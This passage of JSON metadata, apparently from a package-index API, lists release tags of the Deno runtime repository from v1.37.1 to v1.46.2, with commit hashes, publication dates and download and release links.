1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/t